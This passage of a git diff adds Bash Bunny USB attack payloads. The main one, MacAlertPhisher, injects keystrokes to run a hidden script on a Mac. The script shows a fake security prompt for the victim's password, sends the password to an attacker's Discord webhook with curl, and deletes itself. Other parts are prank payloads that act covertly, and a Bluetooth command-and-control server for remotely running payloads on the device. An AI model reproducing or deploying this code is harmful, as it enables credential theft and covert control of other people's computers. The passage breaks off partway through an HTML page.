# Set the Bash Bunny back to ECM Ethernet attack mode
|
||||
ATTACKMODE ECM_ETHERNET
|
||||
|
||||
# Indicate that the payload has finished executing
|
||||
LED FINISH
|
|
@ -0,0 +1,35 @@
|
|||
## Requirements
|
||||
|
||||
Before using this Bash Bunny payload, please ensure you meet the following requirements:
|
||||
|
||||
- **Bash Bunny device**: This payload is designed to run on the Bash Bunny hardware platform. Make sure you have a Bash Bunny device available.
|
||||
- **Installation of essential `adb` packages**: In order to enable `adb` functionality on the Bash Bunny, you need to install the following packages:
|
||||
- `android-liblog`
|
||||
- `android-libbase`
|
||||
- `android-libcutils`
|
||||
- `android-libadb`
|
||||
- `adb`
|
||||
|
||||
### Installing Essential `adb` Packages
|
||||
|
||||
To install the required `adb` packages on your Bash Bunny, follow these steps:
|
||||
|
||||
1. Connect your Bash Bunny to a computer.
|
||||
2. Open a terminal window and navigate to the Bash Bunny storage directory.
|
||||
3. Execute the following commands to download and install the essential `adb` packages:
|
||||
|
||||
```bash
|
||||
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-liblog_7.0.0+r33-1_armhf.deb
|
||||
dpkg -i android-liblog_7.0.0+r33-1_armhf.deb
|
||||
|
||||
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libbase_7.0.0+r33-1_armhf.deb
|
||||
dpkg -i android-libbase_7.0.0+r33-1_armhf.deb
|
||||
|
||||
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libcutils_7.0.0+r33-1_armhf.deb
|
||||
dpkg -i android-libcutils_7.0.0+r33-1_armhf.deb
|
||||
|
||||
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libadb_7.0.0+r33-1_armhf.deb
|
||||
dpkg -i android-libadb_7.0.0+r33-1_armhf.deb
|
||||
|
||||
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/adb_7.0.0+r33-1_armhf.deb
|
||||
dpkg -i adb_7.0.0+r33-1_armhf.deb
|
|
@ -0,0 +1,24 @@
|
|||
# MacAlertPhisher
|
||||
* Author: 90N45
|
||||
* Version: 1.0
|
||||
* Target: Mac
|
||||
* Attackmodes: HID, STORAGE
|
||||
|
||||
### Description
|
||||
Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
|
||||
|
||||
<img width="532" alt="MAcAlertPhisher_alert_preview" src="https://github.com/90N45-d3v/bashbunny-payloads/assets/79598596/d52f4924-c51a-46fd-b2c3-2a8cce45e2cc">
|
||||
<br>
|
||||
<img width="412" alt="MacAlertPhisher_message_preview" src="https://github.com/90N45-d3v/bashbunny-payloads/assets/79598596/8d4e804c-0630-4853-b4ed-7d0904408a50">
|
||||
|
||||
### Setup
|
||||
Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. Optional, you can change the other variables at the top of the `script.sh` file to your needs.
|
||||
|
||||
### Status
|
||||
| LED | State |
|
||||
| --- | --- |
|
||||
| Magenta solid (SETUP) | Set ATTACKMODE |
|
||||
| Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine |
|
||||
| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) |
|
||||
|
||||
*Average runtime: 27 seconds*
|
|
@ -0,0 +1,37 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: MacAlertPhisher
|
||||
# Description: Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
|
||||
# Author: 90N45
|
||||
# Version: 1.0
|
||||
# Category: Phishing
|
||||
# Attackmodes: HID, STORAGE
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
|
||||
|
||||
LED ATTACK
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2500
|
||||
|
||||
QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/script.sh /tmp/script.sh"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
|
||||
QUACK STRING "diskutil eject /Volumes/BashBunny/"
|
||||
QUACK ENTER
|
||||
QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2000
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING "killall Terminal"
|
||||
QUACK ENTER
|
||||
|
||||
LED FINISH
|
|
@ -0,0 +1,76 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Discord Webhook Link (NEEDED)
|
||||
discord=""
|
||||
# The alert's title
|
||||
title="Macintosh Security Assistant"
|
||||
# The alert's text
|
||||
dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are the owner."
|
||||
# The alert's icon (for ex. "stop", "caution", "note")
|
||||
icon="stop"
|
||||
# A custom application, that should open the alert (for ex. "Finder")
|
||||
app=""
|
||||
# Base64 encode the entered string to prevent an injection/error
|
||||
base64=false
|
||||
# Check if an internet connection is available and wait until it is before trying to send the Discord message
|
||||
internet_check=false
|
||||
|
||||
#### The main script
|
||||
|
||||
date=$(date)
|
||||
user=$(whoami)
|
||||
|
||||
if [[ ${app} != "" ]]; then
|
||||
pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer')
|
||||
elif [[ ${app} == "" ]]; then
|
||||
pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer')
|
||||
fi
|
||||
|
||||
pwd=${pwd#*"button returned:Continue, text returned:"}
|
||||
|
||||
if [[ ${base64} == true ]]; then
|
||||
pwd=$(echo $pwd | base64)
|
||||
enc_txt="(Base64)"
|
||||
else
|
||||
enc_txt=""
|
||||
fi
|
||||
|
||||
# Discord Embed Message
|
||||
embed="{
|
||||
\"embeds\": [
|
||||
{
|
||||
\"color\": 14427938,
|
||||
\"footer\": {
|
||||
\"text\": \"Captured: ${date}\"
|
||||
},
|
||||
\"author\": {
|
||||
\"name\": \"Bash Bunny • MacAlertPhisher\",
|
||||
\"url\": \"https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/MacAlertPhisher\",
|
||||
\"icon_url\": \"https://www.gitbook.com/cdn-cgi/image/width=40,dpr=2,height=40,fit=contain,format=auto/https%3A%2F%2F3076592524-files.gitbook.io%2F~%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FnxJgJ9UdPfrcuL1U8DpL%252Ficon%252F1UaEKnAJMPWZDBVtU8Il%252Fbb.png%3Falt%3Dmedia%26token%3D43bf1669-462c-4295-b30b-94c295470371\"
|
||||
},
|
||||
\"fields\": [
|
||||
{
|
||||
\"name\": \"Current User\",
|
||||
\"value\": \"${user}\",
|
||||
\"inline\": true
|
||||
},
|
||||
{
|
||||
\"name\": \"Entered Credentials ${enc_txt}\",
|
||||
\"value\": \"${pwd}\",
|
||||
\"inline\": true
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}"
|
||||
|
||||
if [[ ${internet_check} == true ]]; then
|
||||
while [[ $(ping -c1 google.com | grep -c "1 packets received") != "1" ]]; do
|
||||
sleep 5
|
||||
done
|
||||
fi
|
||||
|
||||
curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "${embed}" ${discord}
|
||||
|
||||
# Self destruct
|
||||
rm /tmp/script.sh
|
|
@ -105,7 +105,7 @@ Arf
|
|||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
* [0iphor13](https://github.com/0iphor13)
|
||||
* [0i41E](https://github.com/0i41E)
|
||||
* [PhilSutter](https://github.com/PhilSutter)
|
||||
|
||||
|
||||
|
|
|
@ -93,7 +93,7 @@ I am Jakoby
|
|||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
* [0iphor13](https://github.com/0iphor13)
|
||||
* [0i41E](https://github.com/0i41E)
|
||||
* [PhilSutter](https://github.com/PhilSutter)
|
||||
|
||||
|
||||
|
|
|
@ -0,0 +1,17 @@
|
|||
# SleepyMacRick
|
||||
* Author: 90N45
|
||||
* Version: 1.0
|
||||
* Target: Mac
|
||||
* Attackmodes: HID, STORAGE
|
||||
|
||||
### Description
|
||||
Installs a script that will listen for user activity in the background. When the user starts working on his machine, a „Rick Roll“ will be triggered.
|
||||
|
||||
### Status
|
||||
| LED | State |
|
||||
| --- | --- |
|
||||
| Magenta solid (SETUP) | Set ATTACKMODE |
|
||||
| Yellow single blink (ATTACK) | Setup and run script on the Mac |
|
||||
| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | „Rick Roll“ is ready and listening for activity |
|
||||
|
||||
*Average runtime: 23 seconds*
|
|
@ -0,0 +1,25 @@
|
|||
#!/bin/bash
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
|
||||
|
||||
LED ATTACK
|
||||
# Open terminal
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
|
||||
QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/rick.sh /tmp/rick.sh"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
|
||||
QUACK STRING "diskutil eject /Volumes/BashBunny/"
|
||||
QUACK ENTER
|
||||
QUACK STRING "chmod +x /tmp/rick.sh && nohup bash /tmp/rick.sh &> /dev/null &"
|
||||
QUACK ENTER
|
||||
QUACK STRING "killall Terminal"
|
||||
QUACK ENTER
|
||||
|
||||
LED FINISH
|
|
@ -0,0 +1,14 @@
|
|||
#! /bin/bash
|
||||
|
||||
sleep 3
|
||||
inactive=$(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name')
|
||||
|
||||
while [[ ${inactive} = $(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name') ]]; do
|
||||
sleep 0.5
|
||||
done
|
||||
|
||||
osascript -e "set volume output volume 100"
|
||||
open -u "https://www.youtube.com/watch?v=xvFZjo5PgG0"
|
||||
|
||||
# Self destruct
|
||||
rm /tmp/rick.sh
|
|
@ -0,0 +1,21 @@
|
|||
# TV-Menu-Trigger
|
||||
* Author: 90N45
|
||||
* Version: 1.0
|
||||
* Target: TV
|
||||
* Attackmodes: HID
|
||||
|
||||
### Description
|
||||
This payload opens the main menu of a TV repeatedly at a random interval (1-10 minutes) to confuse and annoy the user.
|
||||
|
||||
### Explanation
|
||||
Almost every TV has the function of being used by a connected USB keyboard. Therefore, we can use the Bash Bunny to emulate a keyboard and inject keystrokes into the TV. In this case, we inject the keycode for the `GUI` key to open the TV's menu (equivalent to the MENU button on your traditional remote control). Of course, the key required to open the menu could change, because of different vendors, but the keycode of the `GUI` key seems to work for most TVs.
|
||||
|
||||
### Tip
|
||||
Plug your Bash Bunny into a USB port of the TV before it is switched on by your target. This makes it easier to overlook the possible message of a connected keyboard (especially with webOS/LG TVs, as the message is very small on these models and is displayed for a short time).
|
||||
|
||||
### Status
|
||||
| LED | State |
|
||||
| --- | --- |
|
||||
| Magenta solid (SETUP) | Set ATTACKMODE and configure CPU performance |
|
||||
| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attacking the TV (Currently waiting for the random interval to complete) |
|
||||
| Red 1000ms | Opening the TV’s menu |
|
|
@ -0,0 +1,35 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: TV-Menu-Trigger
|
||||
# Description: This payload opens the main menu of a TV repeatedly at a random interval (1-10 minutes) to confuse and annoy the user.
|
||||
# Author: 90N45
|
||||
# Version: 1.0
|
||||
# Category: Prank
|
||||
# Attackmodes: HID
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID
|
||||
|
||||
# Tune the Bash Bunny's CPU to low power/performance for long term deployments
|
||||
CUCUMBER ENABLE
|
||||
|
||||
LED FINISHED
|
||||
|
||||
while [[ true ]]; do
|
||||
LED G
|
||||
# Generate interval time
|
||||
rand=$((6 + $RANDOM % 60))
|
||||
interval="$rand"0000
|
||||
|
||||
# Wait given interval time
|
||||
Q DELAY ${interval}
|
||||
|
||||
# LED feedback on HID injection
|
||||
LED R
|
||||
|
||||
# Open menu
|
||||
Q GUI
|
||||
|
||||
Q DELAY 1000
|
||||
done
|
|
@ -0,0 +1,46 @@
|
|||
import pygatt
|
||||
import base64
|
||||
|
||||
adapter = pygatt.GATTToolBackend()
|
||||
char_uuid = '0000fff2-0000-1000-8000-00805f9b34fb'
|
||||
|
||||
def init():
|
||||
adapter.start()
|
||||
return True
|
||||
|
||||
def connect():
|
||||
device_name = 'BlueBunny'
|
||||
|
||||
devices = adapter.scan(run_as_root=True)
|
||||
device = next((d for d in devices if d['name'] == device_name), None)
|
||||
|
||||
if device:
|
||||
device_address = device['address']
|
||||
bunny = adapter.connect(device_address)
|
||||
|
||||
return bunny
|
||||
else:
|
||||
return False
|
||||
|
||||
def send(bunny, data: str, d_type: str):
|
||||
if d_type == "cmd":
|
||||
flag = "<CMD>"
|
||||
else:
|
||||
flag = "<PAYLOAD>"
|
||||
data = flag + data + flag
|
||||
data = base64.b64encode(data.encode("utf-8")).decode("utf-8")
|
||||
|
||||
if not len(data) <= 15:
|
||||
data_pieces = []
|
||||
|
||||
for i in range(0, len(data), 15):
|
||||
data_pieces.append(data[i:i + 15])
|
||||
|
||||
for i, piece in enumerate(data_pieces):
|
||||
if i == (len(data_pieces) - 1):
|
||||
bunny.char_write(char_uuid, (piece + "\n").encode("utf-8"))
|
||||
else:
|
||||
bunny.char_write(char_uuid, piece.encode("utf-8"))
|
||||
|
||||
else:
|
||||
bunny.char_write(char_uuid, (data + "\n").encode("utf-8"))
|
|
@ -0,0 +1,61 @@
|
|||
from flask import Flask, request, render_template, jsonify
|
||||
import urllib.parse
|
||||
import threading
|
||||
import BunnyLE
|
||||
|
||||
app = Flask(__name__)
|
||||
|
||||
bb = None
|
||||
connection = 0
|
||||
con_fail_count = 0
|
||||
|
||||
def connect_bunny():
|
||||
global bb
|
||||
global connection
|
||||
global con_fail_count
|
||||
|
||||
BunnyLE.init()
|
||||
current_try = BunnyLE.connect()
|
||||
|
||||
if not current_try == False:
|
||||
bb = current_try
|
||||
connection = 1
|
||||
else:
|
||||
con_fail_count += 1
|
||||
connection = 2
|
||||
|
||||
@app.route("/", methods=['GET', 'POST'])
|
||||
def index():
|
||||
if request.method == 'POST':
|
||||
global bb
|
||||
query = request.form.get('query')
|
||||
mode = request.form.get('mode')
|
||||
|
||||
BunnyLE.send(bb, query, mode)
|
||||
|
||||
return render_template("index.html")
|
||||
|
||||
@app.route("/connect", methods=['GET'])
|
||||
def connect():
|
||||
connect_thread = threading.Thread(target=connect_bunny)
|
||||
connect_thread.start()
|
||||
|
||||
return render_template("connecting.html")
|
||||
|
||||
@app.route("/con-check", methods=['GET'])
|
||||
def connectCheck():
|
||||
global con_fail_count
|
||||
|
||||
if connection == 0:
|
||||
return jsonify(connected=0)
|
||||
elif connection == 1:
|
||||
return jsonify(connected=1)
|
||||
elif connection == 2:
|
||||
if con_fail_count < 5:
|
||||
connect_bunny()
|
||||
return jsonify(connected=0)
|
||||
else:
|
||||
return jsonify(connected=2)
|
||||
|
||||
if __name__ == '__main__':
|
||||
app.run(host="localhost", port=1472, debug=True)
|
Binary file not shown.
After Width: | Height: | Size: 3.7 KiB |
Binary file not shown.
File diff suppressed because one or more lines are too long
Binary file not shown.
After Width: | Height: | Size: 44 KiB |
|
@ -0,0 +1,163 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<link rel="SHORTCUT ICON" type="image/x-icon" href="static/bb_icon.png"/>
|
||||
<link rel="icon" type="image/x-icon" href="static/bb_icon.png" />
|
||||
<meta charset="utf-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||||
<title>BlueBunny</title>
|
||||
<meta name="description" content="Remote control your Bash Bunny MKII">
|
||||
<link href="static/bootstrap.min.css" rel="stylesheet">
|
||||
<style type="text/css">
|
||||
.btn-imp {
|
||||
--bs-btn-color: #EC1A24 !important;
|
||||
--bs-btn-border-color: #EC1A24 !important;
|
||||
--bs-btn-hover-border-color: #1a62ec !important;
|
||||
--bs-btn-hover-bg: #1a62ec !important;
|
||||
--bs-btn-hover-color: #ffffff !important;
|
||||
}
|
||||
|
||||
@keyframes spinner {
|
||||
0% {transform: rotate( 0deg ) scale( 1 );}
|
||||
100% {transform: rotate( 360deg ) scale( 1 );}
|
||||
};
|
||||
</style>
|
||||
<script type="text/javascript">
|
||||
let fail_counter = 0
|
||||
|
||||
function tryAgain() {
|
||||
document.getElementById("action").innerHTML = '<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Connecting your Bash Bunny...</h3><div class="text-center" style="margin-top: 100px;"><a class="btn btn-imp" title="Connect" href="/connect" id="connectBtn">Too many fails occured... Try again</a><br><br><p class="fw-bold">OR</p></div><ul style="margin-bottom: 100px;"><li>Make sure your bluetooth adapter is running properly</li><li>Restart your Bash Bunny via unplugging and plugging it back in</li><li>Restart the BlueBunny C2 server\'s operating system</li></ul><p>Please be patient - Making BLE connections can be buggy. It\'s likely a temporary problem that will be gone in a minute.</p>'
|
||||
}
|
||||
|
||||
function connectionCheck() {
|
||||
fetch("/con-check").then(function(response) {
|
||||
return response.json();
|
||||
}).then(function(data) {
|
||||
if (data.connected == 1) {
|
||||
window.location.replace("/");
|
||||
} else if (data.connected == 2) {
|
||||
tryAgain();
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
setInterval(connectionCheck, 5000);
|
||||
</script>
|
||||
</head>
|
||||
<body style="background-color: #202124; color: #adb5bd; height: 100%; overflow: hidden">
|
||||
<div style="filter: blur(2.5px); position: absolute; width: 100%; height: 100%;">
|
||||
<nav class="navbar navbar-expand navbar-light fixed-top shadow-sm" style="border-bottom: solid; border-color: #1a62ec; border-width: 2.5px; background: #202124;">
|
||||
<div class="container-fluid">
|
||||
<a class="navbar-brand">
|
||||
<img src="static/logo.png" style="height: 45px; padding-right: 15px; filter: brightness(0) saturate(100%) invert(23%) sepia(75%) saturate(3313%) hue-rotate(217deg) brightness(99%) contrast(86%);" class="d-inline-block">
|
||||
</a>
|
||||
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
|
||||
<span class="navbar-toggler-icon"></span>
|
||||
</button>
|
||||
<div class="collapse navbar-collapse" id="navbarToggler">
|
||||
<ul class="nav ms-auto">
|
||||
<li class="nav-item">
|
||||
<button class="btn" title="Connect" disabled>Connect to Bash Bunny</button>
|
||||
</li>
|
||||
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
|
||||
<a>©</a>
|
||||
</li>
|
||||
</ul>
|
||||
</div>
|
||||
</div>
|
||||
</nav>
|
||||
<nav class="navbar navbar-expand-lg navbar-light" style="visibility: hidden;">
|
||||
<div class="container-fluid">
|
||||
<a class="navbar-brand" href="#">
|
||||
<img src="static/bb_icon.png" style="height: 45px; padding-right: 15px;" class="d-inline-block"><span style="vertical-align: middle;">BlueBunny</span>
|
||||
</a>
|
||||
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
|
||||
<span class="navbar-toggler-icon"></span>
|
||||
</button>
|
||||
<div class="collapse navbar-collapse">
|
||||
<ul class="nav">
|
||||
<li class="nav-item">
|
||||
<a class="btn">Connect to Bash Bunny</a>
|
||||
</li>
|
||||
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
|
||||
<a>©</a>
|
||||
</li>
|
||||
</ul>
|
||||
<ul class="nav ms-auto">
|
||||
<li class="nav-item">
|
||||
<a class="nav-link">©</a>
|
||||
</li>
|
||||
</ul>
|
||||
</div>
|
||||
</div>
|
||||
</nav>
|
||||
<br>
|
||||
<br>
|
||||
<div class="container" style="display: flex; flex-flow: wrap; justify-content: start;">
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Payload One-Liner <p class="text-dark-emphasis" style="font-size: 15px;"><small>Run a single line of code</small></p></h4>
|
||||
<div class="input-group mb-3">
|
||||
<input type="text" class="form-control" placeholder="Q ALT F4" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
|
||||
<button class="btn">Run</button>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Payload Script <p class="text-dark-emphasis" style="font-size: 15px;"><small>Upload and execute a payload file</small></p></h4>
|
||||
<div class="input-group mb-3">
|
||||
<input type="file" class="form-control" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
|
||||
</div>
|
||||
<button class="btn">Execute Payload</button>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Attack Mode <p class="text-dark-emphasis" style="font-size: 15px;"><small>Configure Ethernet, Storage, HID and Serial</small></p></h4>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
|
||||
<option selected>None</option>
|
||||
</select>
|
||||
<button class="btn">Update</button>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">LED <p class="text-dark-emphasis" style="font-size: 15px;"><small>Light up your Bush Bunny</small></p></h4>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
|
||||
<option selected>Green</option>
|
||||
</select>
|
||||
<button class="btn">Update</button>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">CPU <p class="text-dark-emphasis" style="font-size: 15px;"><small>Tune the CPU to your needs</small></p></h4>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
|
||||
<option selected>Quad Core Ondemand (Default)</option>
|
||||
</select>
|
||||
<button class="btn">Update</button>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Power <p class="text-dark-emphasis" style="font-size: 15px;"><small>Take a break</small></p></h4>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #EC1A24; color: #adb5bd;">
|
||||
<option selected>Shutdown</option>
|
||||
</select>
|
||||
<button class="btn btn-imp">Initialize</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div style="position: absolute; width: 100%; height: 100%;">
|
||||
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
|
||||
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
|
||||
<div style="margin: 20px; width: 100%" id="action">
|
||||
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Connecting your Bash Bunny...</h3>
|
||||
<div class="text-center" style="margin-top: 100px; margin-bottom: 100px;">
|
||||
<img src="static/bb_icon.png" style="height: 5rem; width: 5rem; animation-name: spinner; animation-duration: 1s; animation-delay: 1s; animation-iteration-count: infinite;">
|
||||
</div>
|
||||
<p>This can take some time. Make sure your Bash Bunny is nearby and the BlueBunny payload is running successfully (Green LED).</p>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
|
@ -0,0 +1,337 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<link rel="SHORTCUT ICON" type="image/x-icon" href="static/bb_icon.png"/>
|
||||
<link rel="icon" type="image/x-icon" href="static/bb_icon.png" />
|
||||
<meta charset="utf-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||||
<title>BlueBunny</title>
|
||||
<meta name="description" content="Remote control your Bash Bunny MKII">
|
||||
<link href="static/bootstrap.min.css" rel="stylesheet">
|
||||
<style type="text/css">
|
||||
.btn-imp {
|
||||
--bs-btn-color: #EC1A24 !important;
|
||||
--bs-btn-border-color: #EC1A24 !important;
|
||||
--bs-btn-hover-border-color: #1a62ec !important;
|
||||
--bs-btn-hover-bg: #1a62ec !important;
|
||||
--bs-btn-hover-color: #ffffff !important;
|
||||
}
|
||||
|
||||
.btn {
|
||||
--bs-btn-color: #1a62ec;
|
||||
--bs-btn-border-color: #1a62ec;
|
||||
--bs-btn-hover-border-color: #1a62ec;
|
||||
--bs-btn-hover-bg: #1a62ec;
|
||||
--bs-btn-hover-color: #ffffff;
|
||||
}
|
||||
|
||||
code {
|
||||
color: #1a62ec;
|
||||
}
|
||||
|
||||
.form-control::placeholder {
|
||||
color: #adb5bd;
|
||||
opacity: 0.5;
|
||||
}
|
||||
</style>
|
||||
<script type="text/javascript">
|
||||
function disableControl() {
|
||||
forms = document.getElementsByClassName('form');
|
||||
|
||||
for (i = 0; i < forms.length; i++) {
|
||||
forms[i].getElementsByTagName('form')[0].hidden = true;
|
||||
forms[i].getElementsByTagName('h6')[0].hidden = false;
|
||||
}
|
||||
}
|
||||
|
||||
function enableControl() {
|
||||
forms = document.getElementsByClassName('form');
|
||||
|
||||
for (i = 0; i < forms.length; i++) {
|
||||
forms[i].getElementsByTagName('h6')[0].hidden = true;
|
||||
forms[i].getElementsByTagName('form')[0].hidden = false;
|
||||
}
|
||||
}
|
||||
|
||||
function connectionCheck() {
|
||||
fetch("/con-check").then(function(response) {
|
||||
return response.json();
|
||||
}).then(function(data) {
|
||||
if (data.connected == 0 || data.connected == 2) {
|
||||
document.getElementById("connectBtn").hidden = false;
|
||||
disableControl();
|
||||
} else if (data.connected == 1) {
|
||||
document.getElementById("connectBtn").hidden = true;
|
||||
enableControl();
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
function info(topic) {
|
||||
window.scrollTo(0, 0);
|
||||
|
||||
document.getElementsByTagName("BODY")[0].style["overflow"] = "hidden";
|
||||
|
||||
document.getElementById("page").style["filter"] = "blur(2.5px)";
|
||||
document.getElementById("page").style["position"] = "absolute";
|
||||
document.getElementById("page").style["width"] = "100%";
|
||||
document.getElementById("page").style["height"] = "100%";
|
||||
|
||||
document.getElementById(topic).hidden = false;
|
||||
}
|
||||
|
||||
function infoClose(topic) {
|
||||
document.getElementsByTagName("BODY")[0].style["overflow"] = null;
|
||||
|
||||
document.getElementById("page").style["filter"] = null;
|
||||
document.getElementById("page").style["position"] = null;
|
||||
document.getElementById("page").style["width"] = null;
|
||||
document.getElementById("page").style["height"] = null;
|
||||
|
||||
document.getElementById(topic).hidden = true;
|
||||
}
|
||||
|
||||
function execPayloadFile() {
|
||||
const reader = new FileReader();
|
||||
|
||||
reader.readAsText(document.getElementById("payloadFile").files[0]);
|
||||
|
||||
reader.onloadend = () => {
|
||||
query = reader.result;
|
||||
document.getElementById("payloadContent").value = query;
|
||||
|
||||
document.getElementById("payloadForm").submit();
|
||||
};
|
||||
}
|
||||
|
||||
connectionCheck()
|
||||
setInterval(connectionCheck, 10000);
|
||||
</script>
|
||||
</head>
|
||||
<body style="background-color: #202124; color: #adb5bd; height: 100%">
|
||||
<div id="page">
|
||||
<div>
|
||||
<nav class="navbar navbar-expand navbar-light fixed-top shadow-sm" style="border-bottom: solid; border-color: #1a62ec; border-width: 2px; background: #202124;">
|
||||
<div class="container-fluid">
|
||||
<a class="navbar-brand">
|
||||
<img src="static/logo.png" onclick="info('info_cp')" style="cursor: pointer; height: 45px; padding-right: 15px; padding-bottom: 5px; filter: brightness(0) saturate(100%) invert(23%) sepia(75%) saturate(3313%) hue-rotate(217deg) brightness(99%) contrast(86%);" class="d-inline-block">
|
||||
</a>
|
||||
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
|
||||
<span class="navbar-toggler-icon"></span>
|
||||
</button>
|
||||
<div class="collapse navbar-collapse" id="navbarToggler">
|
||||
<ul class="nav ms-auto">
|
||||
<li class="nav-item">
|
||||
<a class="btn btn-imp" title="Connect" href="/connect" id="connectBtn" hidden>Connect to Bash Bunny</a>
|
||||
</li>
|
||||
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
|
||||
<a style="cursor: pointer; font-size: 1.25rem;" title="Copyright & Attribution" onclick="info('info_cp')">©</a>
|
||||
</li>
|
||||
</ul>
|
||||
</div>
|
||||
</div>
|
||||
</nav>
|
||||
<nav class="navbar navbar-expand-lg navbar-light" style="visibility: hidden;">
|
||||
<div class="container-fluid">
|
||||
<a class="navbar-brand" href="#">
|
||||
